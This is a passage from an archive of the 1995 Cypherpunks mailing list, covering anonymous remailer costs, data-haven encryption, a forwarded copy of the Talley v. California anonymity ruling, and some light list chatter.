Gv3iQmm/j0Lx81dxTB4mjYZUdY3wJQFd4O/vY+mT9I6OmtE6lNDzYRyn9VCl7zfw
t5G67Z6+Pas=
=TosY
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Thu, 19 Jan 95 19:31:04 PST
To: Johnathan Corgan <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <Chameleon.4.01.950119193035.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Well, let's do the math. Since the remailer has to be connected at all
>times, of course, this implies $162 a month in connect charges, over
>and above the other charges. Or $187 a month including the line
>charge. Or $2244 a year. 
>
>This makes a "cheap Linux box" almost a moot point. This is a lot more
>than I'm willing to pay to run a remailer.
>
>(I can imagine workarounds that involve connecting at regular
>intervals to pick up mail....assuming it "accumulates" somewhere (?),
>but the goal of a remailer "on the Net" is what I'm after.)

Well, yes, this is true.  My point was that reliable, fast, easy to use
bandwidth on the order of 128 Kbps is available now in some areas for
relatively cheap rates.  _With the condition_ that continuous access
is not necessary to run a remailer (as I had outlined), this could prove
to be a good jumping off ground for some remailer operators.  Sheesh, I 
could start my own on my home ethernet if I were so inclined.

The solution to the access fee problem is, of course, sharing that fee with
other payees.  Your example of putting boxes directly on TLG's network
is a good example of this.  

>I agree that it's something to look at.

We don't disagree here; we are solving two different problems it appears.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx8uG01Diok8GKihAQHClwP/fVWl/GWM9lWArj4qP4orDV9ZGJWqaCEj
LJYVSekzetdxIn2iBfTcCLCSwYKqTsJgCKha8tqxM9H5Zq2hVUYat9TlGKBZwpfr
b/Vy+N3K1o/+E3NnWxcsJPLaeJfkom1sIJZiZkXKrqUM2v7v2l8MERub7uYG/EIl
5LhaDwdg9ig=
=Acce
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 19 Jan 95 19:52:47 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200054.QAA11075@netcom21.netcom.com>
Message-ID: <Pine.3.89.9501191948.A23853-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Jan 1995, Timothy C. May wrote:
 
> Well, let's do the math. Since the remailer has to be connected at all
> times, of course, this implies $162 a month in connect charges, over
> and above the other charges. Or $187 a month including the line
> charge. Or $2244 a year. 
> 
> This makes a "cheap Linux box" almost a moot point. This is a lot more
> than I'm willing to pay to run a remailer.

Best.com offers a dedicated 28.8kB line connection to the internet 
with $450 setup charge and $60 a month connect charge.  This
is a permanent connection, not a dial up connection.

This works out to $720 per year, plus setup charge.

This is as cheap as it gets for a box on the internet.

Now this is OK if one wishes to run linux, and have a
remailer as one hobby in addition to the main use of the
box, but it is still a bit much to pay for a dedicated 
remailer.

Now I just do not like linux.  Sure it is a great
operating system but it will not run codewright

(Vi causes mental degeneration.  Even though I detest,
loathe, and hate vi, vi takes up so much brainspace that
I find myself issuing vi commands in editors that I 
use much more, and vastly prefer to vi.  Vi is evil.)

Therefore there is no way in the world I am going to
waste a full internet connection and a PC on linux.



 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 19 Jan 95 16:56:32 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID: <Pine.SUN.3.91.950119195241.1505A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:

> Date: Tue, 17 Jan 95 18:55:30 EST
> From: Paul J. Ste. Marie <pstemari@erinet.com>
> To: Eric Hughes <eric@remailer.net>, cypherpunks@toad.com
> Subject: Re: Does encrypted equal safe?
> 
> At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> > ... Meaning is subjective.  If I see encrypted text, am I to be held
> >responsible for having seen through an encryption for which I hold not
> >the key?  Merely because someone knows a transformation into a
> >disapproved form does not mean that I do. ...
> 
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
> won't work.  You have to be provably ignorant of the data.
> 

I must disagree.

This hinges on the REASON for encrypting the data.  In my model, data 
that arrives at the haven unencrypted is unwelcome, and is encrypted to 
be used as traffic "noise," not for security.  Any unencrypted data is 
undesirable, it opening the door to kiddieporn by mail tactics.  
(Government sends user A kiddie porn, then arrests user A for kiddie porn 
possession.)

An automatic encryption of all unencrypted data, the key to which is 
randomly generated and destroyed, allows the traffic to foil analysis, 
while preventing the operator from being subjected to plant frames.

Decrypt on arrival is hardly defensible in this context of course.

> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 19 Jan 95 18:06:00 PST
To: cypherpunks@toad.com
Subject: Which remailer does Julf operate?
Message-ID: <Pine.3.89.9501192004.A20171-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain



sez it all

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Judith Milhon <stjude@well.sf.ca.us>
Date: Thu, 19 Jan 95 20:27:16 PST
To: cypherpunks@toad.com
Subject: stjude?
Message-ID: <199501200427.UAA16720@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain



i'd be happy to get forwarded the skirmishes around my existence. Anybody
save them?

i'm not on the list because i'm writing 2 books, but i have root in the
solar system, true, and i did come up with the name cypherpunk one morning
as i was washing my cat... hit me like a meteorite... cypherpunk... yes...

mumble

>jude<




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.sf.ca.us>
Date: Thu, 19 Jan 95 20:37:51 PST
To: cypherpunks@toad.com
Subject: Supreme Court & Anonymity
Message-ID: <199501200437.UAA20363@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
 
Attached is a Supreme Court decision that may bear directly upon
anonymous remailers and upon people who want to curtail anonymous
remailers.
 
This info came from Dave Banisar at EPIC <banisar@epic.org> via
Stanton McCandlish at EFF <mech@eff.org>. Thanks to Attorney
Banisar for supplying this information.
 
See you in the future,
Andre
- ------------------------------------------------------------
Andre Bacard              Bacard wrote "The Computer Privacy
Box 3009                  Handbook: A Practical Guide to E-Mail
Stanford, CA 94309        Encryption, Data Protection, and PGP
abacard@well.com          Privacy Software" [for novices/experts].
 
Introduction by Mitchell Kapor, Chairman, Electronic Frontier
Foundation and Founder of Lotus 1-2-3.
 
         Book Available February 1995. Write for Details
- ------------------------------------------------------------
 
 
                 TALLEY v. CALIFORNIA 
          SUPREME COURT OF THE UNITED STATES 
                     362 U.S. 60 
            January 13-14, 1960, Argued 
               March 7, 1960, Decided 
 
 
Certiorari to the Appellate Department of the Superior Court of
California, Los Angeles County. 
 
 
 172 Cal. App. 2d Supp. 797, 332 P. 2d 447, reversed. 
 
 A. L. Wirin and Hugh R. Manes argued the cause for petitioner. 
With them on the brief was Fred Okrand. 
 
Philip E. Grey argued the cause for respondent.  With him on the
brief was Roger Arnebergh. 
 
Shad Polier, Will Maslow, Leo Pfeffer and Joseph B. Robison filed
a brief for the American Jewish Congress, as amicus curiae, urging
reversal.
 
Warren, Black, Frankfurter, Douglas, Clark, Harlan, Brennan,
Whittaker, Stewart 
 
 MR. JUSTICE BLACK delivered the opinion of the Court. 
 
The question presented here is whether the provisions of a Los
Angeles City ordinance restricting the distribution of handbills
"abridge the freedom of speech and of the press secured against
state invasion by the Fourteenth Amendment of the Constitution."
 
n1 The ordinance, § 28.06 of the Municipal Code of the City of Los
Angeles, provides: 
 
"No person shall distribute any hand-bill in any place under any
circumstances, which does not have printed on the cover, or the
face thereof, the name and address of the following: 
 "(a) The person who printed, wrote, compiled or manufactured the
same. 
 "(b) The person who caused the same to be distributed; provided,
however, that in the case of a fictitious person or club, in
addition to such fictitious name, the true names and addresses of
the owners, managers or agents of the person sponsoring said
hand-bill shall also appear thereon." 
 
   The petitioner was arrested and tried in a Los Angeles Municipal
Court for violating this ordinance.  It was stipulated that the
petitioner had distributed handbills in Los Angeles, and two of
them were presented in evidence.  Each had printed on it the
following: 
 
 
   National Consumers Mobilization, 
    Box 6533, 
    Los Angeles 55, Calif. 
    PLeasant 9-1576. 
 
 The handbills urged readers to help the organization carry on a
boycott against certain merchants and businessmen, whose names were
given, on the ground that, as one set of handbills said, they
carried products of "manufacturers who will not offer equal
employment opportunities to Negroes, Mexicans, and Orientals."
There also appeared a blank, which, if signed, would request
enrollment of the signer as a "member of National Consumers
Mobilization," and which was preceded by a statement that "I
believe that every man should have an equal opportunity for
employment no matter what his race, religion, or place of birth." 
 
The Municipal Court held that the information printed on the
handbills did not meet the requirements of the ordinance, found the
petitioner guilty as charged, and fined him $ 10.  The Appellate
Department of the Superior Court of the County of Los Angeles
affirmed the conviction, rejecting petitioner's contention, timely
made in both state courts, that the ordinance invaded his freedom
of speech and press in violation of the Fourteenth and First
Amendments to the Federal Constitution. n2 172 Cal. App. 2d Supp.
797, 332 P. 2d 447. Since this was the highest state court
available to petitioner, we granted certiorari to consider this
constitutional contention. 360 U.S. 928. 
 
In Lovell v. Griffin, 303 U.S. 444,   we held void on its face an
ordinance that comprehensively forbade any distribution of
literature at any time or place in Griffin, Georgia, without a
license. Pamphlets and leaflets, it was pointed out, "have been
historic weapons in the defense of liberty" n3 and enforcement of
the Griffin ordinance "would restore the system of license and
censorship in its baldest form." Id., at 452. A year later we had
before us four ordinances each forbidding distribution of leaflets
-- one in Irvington, New Jersey, one in Los Angeles, California,
one in Milwaukee, Wisconsin, and one in Worcester, Massachusetts. 
Schneider v. State, 308 U.S. 147. Efforts were made to distinguish
these four ordinances from the one held void in the Griffin case. 
The chief grounds urged for distinction were that the four
ordinances had been passed to prevent either frauds, disorder, or
littering, according to the records in these cases, and another
ground urged was that two of the ordinances applied only to certain
city areas.  This Court refused to uphold the four ordinances on
those grounds pointing out that there were other ways to accomplish
these legitimate aims without abridging freedom of speech and
press.  Frauds, street littering and disorderly conduct could be
denounced and punished as offenses, the Court said.  Several years
later we followed the Griffin and Schneider cases in striking down
a Dallas, Texas, ordinance which was applied to prohibit the
dissemination of information by the distribution of handbills.  We
said that although a city could punish any person for conduct on
the streets if he violates a valid law, "one who is rightfully on
a street . . . carries with him there as elsewhere the
constitutional right to express his views in an orderly fashion .
. . by handbills and literature as well as by the spoken word."
Jamison v. Texas, 318 U.S. 413, 416. 
 
The broad ordinance now before us, barring distribution of "any
hand-bill in any place under any circumstances," n4 falls precisely
under the ban of our prior cases unless this ordinance is saved by
the qualification that handbills can be distributed if they have
printed on them the names and addresses of the persons who
prepared, distributed  or sponsored them.  For, as in Griffin, the
ordinance here is not limited to handbills whose content is
"obscene or offensive to public morals or that advocates unlawful
conduct." Counsel has urged that this ordinance is aimed at
providing a way to identify those responsible for fraud, false
advertising and libel. Yet the ordinance is in no manner so
limited, nor have we been referred to any legislative history
indicating such a purpose. Therefore we do not pass on the validity
of an ordinance limited to prevent these or any other supposed
evils.  This ordinance simply bars all handbills under all
circumstances anywhere that do not have the names and addresses
printed on them in the place the ordinance requires. 
 
There can be no doubt that such an identification requirement would
tend to restrict freedom to distribute information and thereby
freedom of expression. "Liberty of circulating is as essential to
that freedom as liberty of publishing; indeed, without the
circulation, the publication would be of little value." Lovell v.
Griffin, 303 U.S., at 452. 
 
   Anonymous pamphlets, leaflets, brochures and even books have
played an important role in the progress of mankind.  Persecuted
groups and sects from time to time throughout history have been
able to criticize oppressive practices and laws either anonymously
or not at all.  The obnoxious press licensing law of England, which
was also enforced on the Colonies was due in part to the knowledge
that exposure of the names of printers, writers and distributors
would lessen the circulation of literature critical of the
government.  The old seditious libel cases in England show the
lengths to which government had to go to find out who was
responsible for books that were obnoxious to the rulers.  John
Lilburne was whipped, pilloried and fined for refusing to answer
questions designed to get evidence to convict him or someone else
for the secret distribution of books in England.  Two Puritan
Ministers, John Penry and John Udal, were sentenced to death on
charges that they were responsible for writing, printing or
publishing books. n6 Before the Revolutionary War colonial patriots
frequently had to conceal their authorship or distribution of
literature that easily could have brought down on them prosecutions
by English-controlled courts.  Along about that time the Letters of
Junius were written and the identity of their author is unknown to
this day. n7 Even the Federalist Papers, written in favor of the
adoption of our Constitution, were published under fictitious
names.  It is plain that anonymity has sometimes been assumed for
the most constructive purposes. 
 
   We have recently had occasion to hold in two cases that there
are times and circumstances when States may not compel members of
groups engaged in the dissemination of ideas to be publicly
identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v.
Alabama, 357 U.S. 449, 462. The reason for those holdings was that
identification and fear of reprisal might deter perfectly peaceful
discussions of public matters of importance.  This broad Los
Angeles ordinance is subject to the same infirmity.  We hold that
it, like the Griffin, Georgia, ordinance, is void on its face. 
 
   The judgment of the Appellate Department of the Superior Court
of the State of California is reversed and the cause is remanded to
it for further proceedings not inconsistent with this opinion. 
 
   It is so ordered. 
 
Footnotes 
 
n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin,
303 U.S. 444, 450. 
 
n2 Petitioner also argues here that the ordinance both on its face
and as construed and applied "arbitrarily denies petitioner equal
protection of the laws in violation of the Due Process and Equal
Protection" Clauses of the Fourteenth Amendment.  This argument is
based on the fact that the ordinance applies to handbills only, and
does not include within its proscription books, magazines and
newspapers.  Our disposition of the case makes it unnecessary to
consider this contention. 
 
n3 The Court's entire sentence was: "These [pamphlets and leaflets]
indeed have been historic weapons in the defense of liberty, as the
pamphlets of Thomas Paine and others in our own history abundantly
attest." It has been noted that some of Thomas Paine's pamphlets
were signed with pseudonyms.  See Bleyer, Main Currents in the
History of American Journalism (1927), 90-93. Illustrations of
other anonymous and pseudonymous pamphlets and other writings used
to discuss important public questions can be found in this same
volume. 
 
n4 Section 28.00 of the Los Angeles Municipal Code defines
"handbill" as follows: "'HAND-BILL' shall mean any hand-bill,
dodger, commercial advertising circular, folder, booklet, letter,
card, pamphlet, sheet, poster, sticker, banner, notice or other
written, printed or painted matter calculated to attract attention
of the public." 
 
n5 Lovell v. Griffin, 303 U.S., at 451. 
 
n6 Penry was executed and Udal died as a result of his confinement.
1 Hallam, The Constitutional History of England (1855), 205-206,
232.
 
n7 In one of the letters written May 28, 1770, the author asked the
following question about the tea tax imposed on this country, a
question which he could hardly have asked but for his anonymity: 
"What is it then, but an odious, unprofitable exertion of a
speculative right, and fixing a badge of slavery upon the
Americans, without service to their masters?" 2 Letters of Junius
(1821) 39. 
 
 
MR. JUSTICE HARLAN, concurring. 
 
   In judging the validity of municipal action affecting rights of
speech or association protected against invasion by the Fourteenth
Amendment, I do not believe that we can escape, as Mr. Justice
Roberts said in Schneider v. State, 308 U.S. 147, 161, "the
delicate and difficult task" of weighing "the circumstances" and
appraising "the substantiality of the reasons advanced in support
of the regulation of the free enjoyment of" speech.  More recently
we have said that state action impinging on free speech and
association will not be sustained unless the governmental interest
asserted to support such impingement is compelling.  See N. A. A.
C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire,
354 U.S. 234, 265 (concurring opinion); see also Bates v. Little
Rock, 361 U.S. 516. 
 
   Here the State says that this ordinance is aimed at the
prevention of "fraud, deceit, false advertising, negligent use of
words, obscenity, and libel," in that it will aid in the detection
of those responsible for spreading material of that character.  But
the ordinance is not so limited, and I think it will not do for
the State simply to say that the circulation of all anonymous
handbills must be suppressed in order to identify the distributors
of those that may be of an obnoxious character.  In the absence of
a more substantial showing as to Los Angeles' actual experience
with the distribution of obnoxious handbills, * such a
generality is for me too remote to furnish a constitutionally
acceptable justification for the deterrent effect on free speech
which this all-embracing ordinance is likely to have. 
 
 
   On these grounds I concur in the judgment of the Court. 
 
Footnotes: 
 
 
   * On the oral argument the City Attorney stated: 
 
   "We were able to find out that prior to 1931 an effort was made
by the local Chamber of Commerce, urging the City Council to do
something about these handbills and advertising matters which were
false and misleading -- had no names of sponsors.  They were
particularly interested in the fictitious name. They said, 'Who are
these people that are distributing; who are advertising; doing
things of that sort?' The meager record that we were able to find
indicates that a request from the Council to the City Attorney as
to their legal opinion on this subject [sic].  The City Attorney
wrote back and formed the conclusion that distribution of
handbills, pamphlets, or other matters, without the name of the
fictitious firm or officers would be legal [sic].  Thereafter in
the early part of 1932 an ordinance was drafted, and submitted to
the City Council, and approved by them, which related to the
original subject -- unlawful for any person, firm or association to
distribute in the city of Los Angeles any advertisement or handbill
-- or any other matter which does not have the names of the
sponsors of such literature." 
 
 
MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE
WHITTAKER join, dissenting. 
 
   To me, Los Angeles' ordinance cannot be read as being void on
its face. Certainly a fair reading of it does not permit a
conclusion that it prohibits the distribution of handbills "of any
kind at any time, at any place, and in any manner," Lovell v.
Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. 
In Griffin, the ordinance completely prohibited the unlicensed
distribution of any handbills.  As I read it, the ordinance here
merely prohibits the distribution of a handbill which does not
carry the identification of the name of the person who "printed,
wrote, compiled . . . manufactured [or] . . . caused" the
distribution of it.  There could well be a compelling reason for
such a requirement.  The Court implies as much when it observes
that Los Angeles has not "referred to any legislative history
indicating" that the ordinance was adopted for the purpose of
preventing "fraud, false advertising and libel." But even as to its
legislative background there is pertinent material which the Court
overlooks.  At oral argument, the City's chief law enforcement
officer stated that the ordinance was originally suggested in 1931
by the Los Angeles Chamber of Commerce in a complaint to the City
Council urging it to "do something about these handbills and
advertising matters which were false and misleading." Upon inquiry
by the Council, he said, the matter was referred to his office, and
the Council was advised that such an ordinance as the present one
would be valid.  He further stated that this ordinance, relating to
the original inquiry of the Chamber of Commerce, was thereafter
drafted and submitted to the Council.  It was adopted in 1932.  In
the face of this and the presumption of validity that the ordinance
enjoys, the Court nevertheless strikes it down, stating that it
"falls precisely under the ban of our prior cases." This cannot
follow, for in each of the three cases cited, the ordinances either
"forbade any distribution of literature . . . without a license,"
Lovell v. Griffin, supra, or forbade, without exception, any
distribution of handbills on the streets, Jamison v. Texas, 318
U.S. 413 (1943); or, as in Schneider v. State, 308 U.S. 147
(1939), which covered different ordinances in four cities, they
were either outright bans or prior restraints upon the distribution
of handbills.  I, therefore, cannot see how the Court can conclude
that the Los Angeles ordinance here "falls precisely" under any of
these cases.  On the contrary, to my mind, they neither control
this case nor are apposite to it.  In fact, in Schneider, depended
upon by the Court, it was held, through Mr. Justice Roberts, that,
"In every case . . . where legislative abridgment of the rights is
asserted, the courts should be astute to examine the effect of the
challenged legislation . . . weigh the circumstances and . . .
appraise the substantiality of the reasons advanced . . . ." Id.,
at 161. The Court here, however, makes no appraisal of the
circumstances, or the substantiality of the claims of the
litigants, but strikes down the ordinance as being "void on its
face." I cannot be a party to using such a device as an escape from
the requirements of our cases, the latest of which was handed down
only last month.  Bates v. Little Rock, 361 U.S. 516.  n1 
 
   Therefore, before passing upon the validity of the ordinance, I
would weigh the interests of the public in its enforcement against
the claimed right of Talley.  The record is barren of any claim,
much less proof, that he will suffer any injury whatever by
identifying the handbill with his name.  Unlike N. A. A. C. P. v.
Alabama, 357 U.S. 449 (1958), which is relied upon, there is
neither allegation nor proof that Talley or any group sponsoring
him would suffer "economic reprisal, loss of employment, threat of
physical coercion [or] other manifestations of public hostility."
Id., at 462. Talley makes no showing whatever to support his
contention that a restraint upon his freedom of speech will result
from the enforcement of the ordinance.  The existence of such a
restraint is necessary before we can strike the ordinance down. 
 
   But even if the State had this burden, which it does not, the
substantiality of Los Angeles' interest in the enforcement of the
ordinance sustains its validity.  Its chief law enforcement officer
says that the enforcement of the ordinance prevents "fraud, deceit,
false advertising, negligent use of words, obscenity, and libel,"
and, as we have said, that such was its purpose.  In the absence of
any showing to the contrary by Talley, this appears to me entirely
sufficient. 
 
   I stand second to none in supporting Talley's right of free
speech -- but not his freedom of anonymity.  The Constitution says
nothing about freedom of anonymous speech.  In fact, this Court has
approved laws requiring no less than Los Angeles' ordinance.  I
submit that they control this case and require its approval under
the attack made here.  First, Lewis Publishing Co. v. Morgan, 229
U.S. 288 (1913), upheld an Act of Congress requiring any newspaper
using the second-class mails to publish the names of its editor,
publisher, owner, and stockholders.  39 U. S. C. @ 233. Second, in
the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress
requires those engaged in lobbying to divulge their identities and
give "a modicum of information" to Congress. United States v.
Harriss, 347 U.S. 612, 625 (1954).  Third, the several States have
corrupt practices acts outlawing, inter alia, the distribution of
anonymous publications with reference to political candidates. n2
While these statutes are leveled at political campaign and election
practices, the underlying ground sustaining their validity applies
with equal force here. 
 
   No civil right has a greater claim to constitutional protection
or calls for more rigorous safeguarding than voting rights.  In
this area the danger of coercion and reprisals -- economic and
otherwise -- is a matter of common knowledge.  Yet these statutes,
disallowing anonymity in promoting one's views in election
campaigns, have expressed the overwhelming public policy of the
Nation.  Nevertheless the Court is silent about this impressive
authority relevant to the disposition of this case. 
 
   All three of the types of statutes mentioned are designed to
prevent the same abuses -- libel, slander, false accusations, etc.
The fact that some of these statutes are aimed at elections,
lobbying, and the mails makes their restraint no more palatable,
nor the abuses they prevent less deleterious to the public
interest, than the present ordinance. 
 
   All that Los Angeles requires is that one who exercises his
right of free speech through writing or distributing handbills
identify himself just as does one who speaks from the platform. 
The ordinance makes for the responsibility in writing that is
present in public utterance.  When and if the application of such
an ordinance in a given case encroaches on First Amendment
freedoms, then will be soon enough to strike that application
down.  But no such restraint has been shown here.  After all, the
public has some rights against which the enforcement of freedom of
speech would be "harsh and arbitrary in itself." Kovacs v. Cooper,
336 U.S. 77, 88 (1949). We have upheld complete proscription of
uninvited door-to-door canvassing as an invasion of privacy. Breard
v. Alexandria, 341 U.S. 622 (1951). Is this less restrictive than
complete freedom of distribution -- regardless of content -- of a
signed handbill? And commercial handbills may be declared verboten,
Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content
or identification.  Is Talley's anonymous handbill, designed to
destroy the business of a commercial establishment, passed out at
its very front door, and attacking its then lawful commercial
practices, more comportable with First Amendment freedoms?  I think
not.  Before we may expect international responsibility among
nations, might not it be well to require individual responsibility
at home?  Los Angeles' ordinance does no more. 
 
   Contrary to petitioner's contention, the ordinance as applied
does not arbitrarily deprive him of equal protection of the law.
He complains that handbills are singled out, while other printed
media -- books, magazines, and newspapers -- remain unrestrained. 
However, "the problem of legislative classification is a perennial
one, admitting of no doctrinaire definition.  Evils in the same
field may be of different dimensions and proportions, requiring
different remedies. . . .  Or the reform may take one step at a
time, addressing itself to the phase of the problem which seems
most acute to the legislative mind. . . .  The prohibition of the
Equal Protection Clause goes no further than the invidious
discrimination. [I] cannot say that that point has been reached
here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). 
 
   I dissent. 
 
Footnotes 
 
n1 "When it is shown that state action threatens significantly to
impinge upon constitutionally protected freedom it becomes the duty
of this Court to determine whether the action bears a reasonable
relationship to the achievement of the governmental purpose
asserted as its justification." 361 U.S., at 525. 
 
n2 Thirty-six States have statutes prohibiting the anonymous
distribution of materials relating to elections.  E. g.: Kan. Gen.
Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev.
Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546. 
 
          ********************************************
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel) 
Electronic Privacy Information Center * 202-547-5482 (fax) 
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic
         **********************************************
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.7
 
iQCVAwUBLx7L1d6pT6nCx/9/AQHhQwP+PcbJgT5Eyx+9TNIoOSMQJXnnlT0iiHM1
qhKC4Xg2ZZl4/u1Pe927S3UfDXoEunoSAOaq1hgi8c4Wjd31XPM5wFHRdE18/UWZ
RXLmLQ+qT6MIFQIicOs6bpDeLCusqT3SF1krViIpIwqscwcdRgu8t1IUbfMVC/6w
oFsKqF3fj7o=
=XCRK
-----END PGP SIGNATURE-----
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 19 Jan 95 17:45:27 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: What is this? Anonymous message failed
In-Reply-To: <v01510108ab4279f1317d@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950119204225.13707D-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Jan 1995, Lucky Green wrote:

> Just got back a message from Julf's remailer that my Anonymous message failed
> (wrong password). Needless to say, I didn't try to send one through the
> remailer. The message it was referring to is the one I sent to the list
> earlier. Is this a repeat of the an/na problems we had in the past?

	Yes. The unfortunate culprit was <an157790@anon.penet.fi>. I sent 
him mail, non-blinded, and posted a message to Cypherpunks and to 
<cypherpunks-owner> to get it fixed. I haven't been getting them anymore, 
so I suspect somebody fixed the problem.

	A while ago, someone posted a regexp for majordomo that would 
automatically convert a <an> address to a <na> address. Does anyone have 
that lying around anywhere?

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@pylon.com
Date: Thu, 19 Jan 95 20:46:04 PST
To: cypherpunks@toad.com
Subject: T.A.Z. on Disk
Message-ID: <199501200446.UAA04577@deepthought.pylon.com>
MIME-Version: 1.0
Content-Type: text/plain


I just sent this email to Sandy Sandfort,  and he suggested I 
share it with the list:

-------------------
I was just at BlockBuster Music store this evening and happened 
to go by the 'H's in the Rock Music section  -  and saw Hakim 
Bey's name.  Yes, there is a CD named T.A.Z *.    Blockbuster 
allows customers to listen to CDs before they buy, so I 
listened to it.   Hakim actually reads several chapters from 
his book, and there is odd music at the introduction and in the 
background while he reads.    He has a very nice, deep, clear 
voice.

I guess you could say this is one of those self-help 
books-on-tape   -  sort of a "save time & become an anarchist 
while you drive" CD.


*T.A.Z. = The Autonomous Zone

    ..
Blanc 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@pylon.com
Date: Thu, 19 Jan 95 22:05:30 PST
To: cypherpunks@toad.com
Subject: Ask Bill
Message-ID: <199501200606.WAA05378@deepthought.pylon.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Gates now has an address for questions  -   
askbill@microsoft.com

He has a column which is published every other Wednesday in the 
local Seattle Post-Intelligencer, where he answers a few of the 
questions which he finds in that mailbox address.   He says he 
will not reply to questions personally (only in the column), 
but you never know  -  a few of you special people could burn 
his ear and perhaps elicit one to yourself (or perhaps even to 
the list!)

    ..
Blanc 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 19 Jan 95 20:39:08 PST
To: stjude@well.sf.ca.us (Judith Milhon)
Subject: Re: stjude?
In-Reply-To: <199501200427.UAA16720@well.sf.ca.us>
Message-ID: <199501200441.WAA03899@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> i'm not on the list because i'm writing 2 books, but i have root in the
> solar system, true, and i did come up with the name cypherpunk one morning
> as i was washing my cat... hit me like a meteorite... cypherpunk... yes...
> 

Now wait just one second here....I have root at Solar Soyuz Zaibatsu and that
is about as close to the solar system as you can get.....you stole the 
passwords......somebody call the net cops !!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 19 Jan 95 22:43:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200105.RAA05837@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.950119223857.28755A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Jan 1995, sameer wrote:

> 	To my knowledge there exists 3 packages which allow you to run
> a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance
> Cottrell?), and the simple package available on ftp.csua.berkeley.edu,
> which derives from Eric and Hal's original code.

Can anyone give an overview of the remailer packages that are currently
available?  What features and differences do they have, and where to get
them?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 19 Jan 95 22:52:53 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: traffic analyzing Chaum's digital mix
Message-ID: <Pine.SUN.3.91.950119224724.28755B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been thinking about the problem of traffic analysis of a 
